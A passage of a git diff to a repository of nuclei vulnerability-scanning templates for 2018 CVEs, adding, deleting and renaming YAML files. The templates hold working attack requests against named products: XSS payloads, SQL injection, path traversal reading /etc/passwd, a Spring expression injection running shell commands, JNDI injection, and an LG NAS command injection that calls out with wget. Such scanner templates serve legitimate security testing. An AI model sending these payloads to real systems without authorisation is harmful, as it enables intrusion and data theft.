6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" - read: 1024 - - host: - - "{{Hostname}}" - - read-size: 1024 - matchers: - - type: regex - regex: - - "\\$Proxy[0-9]+" diff --git a/nuclei-templates/CVE-2018/cve-2018-3238.yaml b/nuclei-templates/CVE-2018/CVE-2018-3238.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3238.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3238.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-6200.yaml b/nuclei-templates/CVE-2018/CVE-2018-6200.yaml new file mode 100644 index 0000000000..0d5d845508 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-6200.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-6200 + +info: + name: vBulletin - Open Redirect + author: 0x_Akoko,daffainfo + severity: medium + description: | + vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. + reference: + - https://cxsecurity.com/issue/WLB-2018010251 + - https://nvd.nist.gov/vuln/detail/CVE-2018-6200 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-6200 + cwe-id: CWE-601 + epss-score: 0.00141 + epss-percentile: 0.48943 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: vbulletin + product: vbulletin + tags: cve,cve2018,redirect,vbulletin + +http: + - method: GET + path: + - '{{BaseURL}}/redirector.php?url=https://interact.sh' + - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f4a971fd11c1a927c6e873c51427acdcd586d9c2448cabe3510e615451cc809d0221008b30ac4f0c3254be852c1b557d4d975cdb12e938e9d8f75acfb27c6557b5266a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-7543.yaml b/nuclei-templates/CVE-2018/CVE-2018-7543.yaml new file mode 100644 index 0000000000..4b78257b14 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-7543.yaml @@ -0,0 +1,58 @@ +id: CVE-2018-7543 + +info: + name: > + Duplicator <= 1.2.32 - Cross-Site Scripting + author: topscoder + severity: medium + description: > + Cross-site scripting (XSS) vulnerability in installer/build/view.step4.php of the SnapCreek Duplicator plugin 1.2.32 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the json parameter. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/010ce1c3-dd07-4ed6-8908-0909c0842be8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-7543 + metadata: + fofa-query: "wp-content/plugins/duplicator/" + google-query: inurl:"/wp-content/plugins/duplicator/" + shodan-query: 'vuln:CVE-2018-7543' + tags: cve,wordpress,wp-plugin,duplicator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "duplicator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.32') \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-9995.yaml b/nuclei-templates/CVE-2018/CVE-2018-9995.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9995.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9995.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-0296.yaml b/nuclei-templates/CVE-2018/cve-2018-0296.yaml deleted file mode 100644 index 2bc87caa63..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-0296.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-0296 - -info: - name: Cisco ASA path traversal vulnerability - author: organiccrap - severity: high - tags: cve,cve2018,cisco,lfi - reference: https://github.com/yassineaboukir/CVE-2018-0296 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 - cve-id: CVE-2018-0296 - cwe-id: CWE-22 - description: "A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029." - -requests: - - method: GET - path: - - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" - headers: - Accept-Encoding: deflate - - matchers-condition: and - matchers: - - type: word - words: - - "///sessions" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-1000130.yaml b/nuclei-templates/CVE-2018/cve-2018-1000130.yaml deleted file mode 100644 index 9421966f6e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000130.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-1000130 - -info: - name: Jolokia Agent Proxy JNDI Code Injection - author: milo2012 - severity: high - description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. - tags: cve,cve2018,jolokia,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2018-1000130 - cwe-id: CWE-74 - reference: - - https://jolokia.org/#Security_fixes_with_1.5.0 - - https://access.redhat.com/errata/RHSA-2018:2669 - -requests: - - raw: - - | - POST /jolokia/read/getDiagnosticOptions HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Content-Type: application/x-www-form-urlencoded - - { - "type":"read", - "mbean":"java.lang:type=Memory", - "target":{ - "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" - } - } - - matchers-condition: and - matchers: - - type: word - words: - - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml deleted file mode 100644 index c6b5484929..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2018-1000226 - -info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass - author: c-sh0 - reference: - - https://github.com/cobbler/cobbler/issues/1916 - - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - severity: critical - tags: cve,cve2018,cobbler,auth-bypass - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1000226 - cwe-id: CWE-732 - -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - _CobblerXMLRPCInterface__make_token - - - cobbler - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "Content-Type: text/xml" - - - type: word - part: body - words: - - "" - - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - - type: regex - part: body - regex: - - "(.*[a-zA-Z0-9].+==)" diff --git a/nuclei-templates/CVE-2018/cve-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml new file mode 100644 index 0000000000..836d88b898 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-1000856 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. + reference: + - https://github.com/domainmod/domainmod/issues/80 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-1000856 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /segments/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test + - | + GET /segments/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10201.yaml b/nuclei-templates/CVE-2018/cve-2018-10201.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-10201.yaml rename to nuclei-templates/CVE-2018/cve-2018-10201.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10230.yaml b/nuclei-templates/CVE-2018/cve-2018-10230.yaml new file mode 100644 index 0000000000..18f404ad06 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-10230.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-10230 + +info: + name: Zend Server < 9.13 - XSS + author: marcos_iaf + severity: medium + description: | + A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + reference: + - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://www.zend.com/en/products/server/release-notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-10230 + cwe-id: CWE-79 + tags: cve,cve2018,xss,zend + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "is not allowed to open debug sessions" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10818.yaml b/nuclei-templates/CVE-2018/cve-2018-10818.yaml deleted file mode 100644 index f4982c8731..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-10818.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-10818 - -info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. - reference: - - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oast - -requests: - - raw: - - | - POST /system/sharedir.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &uid=10; wget http://{{interactsh-url}} - - - | - POST /en/php/usb_sync.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &act=sync&task_number=1;wget http://{{interactsh-url}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml b/nuclei-templates/CVE-2018/cve-2018-10822.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-10822.yaml rename to nuclei-templates/CVE-2018/cve-2018-10822.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11231.yaml b/nuclei-templates/CVE-2018/cve-2018-11231.yaml new file mode 100644 index 0000000000..07cc95c8dc --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-11231.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-11231 + +info: + name: Opencart Divido - Sql Injection + author: ritikchaddha + severity: high + description: | + OpenCart Divido plugin is susceptible to SQL injection + reference: + - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + tags: cve,cve2018,opencart,sqli + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/cve-2018-1273.yaml b/nuclei-templates/CVE-2018/cve-2018-1273.yaml deleted file mode 100644 index 819b07b7a6..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1273.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-1273 - -info: - name: Spring Data Commons Unauthenticated RCE - author: dwisiswant0 - severity: critical - description: | - Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, - and older unsupported versions, contain a property binder vulnerability - caused by improper neutralization of special elements. - An unauthenticated remote malicious user (or attacker) can supply - specially crafted request parameters against Spring Data REST backed HTTP resources - or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - tags: cve,cve2018,vmware,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1273 - cwe-id: CWE-20 - -requests: - - raw: - - | - POST /account HTTP/1.1 - Host: {{Hostname}} - Connection: close - Content-Type: application/x-www-form-urlencoded - - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei - - payloads: - command: - - "cat /etc/passwd" - - "type C:\\/Windows\\/win.ini" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/cve-2018-13980.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-13980.yaml rename to nuclei-templates/CVE-2018/cve-2018-13980.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml b/nuclei-templates/CVE-2018/cve-2018-14064.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-14064.yaml rename to nuclei-templates/CVE-2018/cve-2018-14064.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15640.yaml b/nuclei-templates/CVE-2018/cve-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-15640.yaml rename to nuclei-templates/CVE-2018/cve-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/cve-2018-15657.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-15657.yaml rename to nuclei-templates/CVE-2018/cve-2018-15657.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16059.yaml b/nuclei-templates/CVE-2018/cve-2018-16059.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16059.yaml rename to nuclei-templates/CVE-2018/cve-2018-16059.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16133.yaml b/nuclei-templates/CVE-2018/cve-2018-16133.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16133.yaml rename to nuclei-templates/CVE-2018/cve-2018-16133.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16716.yaml b/nuclei-templates/CVE-2018/cve-2018-16716.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16716.yaml rename to nuclei-templates/CVE-2018/cve-2018-16716.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/cve-2018-16761.yaml new file mode 100644 index 0000000000..ec40ee117f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-16761.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-16761 + +info: + name: Eventum v3.3.4 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + Eventum before 3.4.0 has an open redirect vulnerability. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ + - https://github.com/eventum/eventum/ + - https://www.cvedetails.com/cve/CVE-2018-16761/ + - https://github.com/eventum/eventum/releases/tag/v3.4.0 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-16761 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,eventum,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/select_project.php?url=http://interact.sh' + - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh' + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/cve-2018-17422.yaml new file mode 100644 index 0000000000..02d8bd123f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-17422.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-17422 + +info: + name: dotCMS < 5.0.2 - Open Redirect + author: 0x_Akoko,daffainfo + severity: medium + description: | + dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. + reference: + - https://github.com/dotCMS/core/issues/15286 + - https://www.cvedetails.com/cve/CVE-2018-17422 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-17422 + cwe-id: CWE-601 + metadata: + shodan-query: http.title:"dotCMS" + verified: "true" + tags: cve,cve2018,redirect,dotcms + +requests: + - method: GET + path: + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "self.location = 'http://www.interact.sh'" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-18069.yaml b/nuclei-templates/CVE-2018/cve-2018-18069.yaml new file mode 100644 index 0000000000..0ffc225e0b --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18069.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-18069 +info: + name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting + author: nadino + severity: medium + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,plugin +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin.php" + body: | + icl_post_action=save_theme_localization&locale_file_name_en=EN"> + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "text/html")' + - 'contains(set_cookie, "_icl_current_admin_language")' + - 'contains(body, "\">")' + condition: and + +# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/cve-2018-18264.yaml b/nuclei-templates/CVE-2018/cve-2018-18264.yaml deleted file mode 100644 index fdc79d334f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-18264.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2018-18264 - -info: - name: Kubernetes Improper Authentication - author: medbsq - severity: critical -# https://www.cvebase.com/cve/2018/18264 -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - - "{{BaseURL}}//k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "objectRef" - - "apiVersion" - condition: or - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-18777.yaml b/nuclei-templates/CVE-2018/cve-2018-18777.yaml deleted file mode 100644 index b0b5a72de4..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-18777.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2018-18777 - -info: - name: Path traversal vulnerability in Microstrategy Web version 7 - author: 0x_Akoko - severity: medium - description: | - Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) - allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. - (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. - reference: https://www.exploit-db.com/exploits/45755 - tags: cve,cve2018,microstrategy,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 - cve-id: CVE-2018-18777 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19136.yaml b/nuclei-templates/CVE-2018/cve-2018-19136.yaml deleted file mode 100644 index 2fa0974afa..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19136.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2018-19136 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/registrar-account.php. - reference: - - https://www.exploit-db.com/exploits/45883/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19136 - - https://github.com/domainmod/domainmod/issues/79 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19136 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">&really_del=1">YES' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19137.yaml b/nuclei-templates/CVE-2018/cve-2018-19137.yaml deleted file mode 100644 index c689c4e74a..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19137.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-19137 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. - reference: - - https://github.com/domainmod/domainmod/issues/79 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19137 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&really_del' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19752.yaml b/nuclei-templates/CVE-2018/cve-2018-19752.yaml new file mode 100644 index 0000000000..4876f6389a --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19752.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-19752 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 + - https://github.com/domainmod/domainmod/issues/84 + - https://www.exploit-db.com/exploits/45949/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19752 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/registrar.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test + - | + GET /assets/registrars.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19753.yaml b/nuclei-templates/CVE-2018/cve-2018-19753.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19753.yaml rename to nuclei-templates/CVE-2018/cve-2018-19753.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-19892.yaml b/nuclei-templates/CVE-2018/cve-2018-19892.yaml new file mode 100644 index 0000000000..70ca1dc6b6 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19892.yaml @@ -0,0 +1,51 @@ +id: CVE-2018-19892 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters. + reference: + - https://www.exploit-db.com/exploits/45959 + - https://github.com/domainmod/domainmod/issues/85 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19892 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / 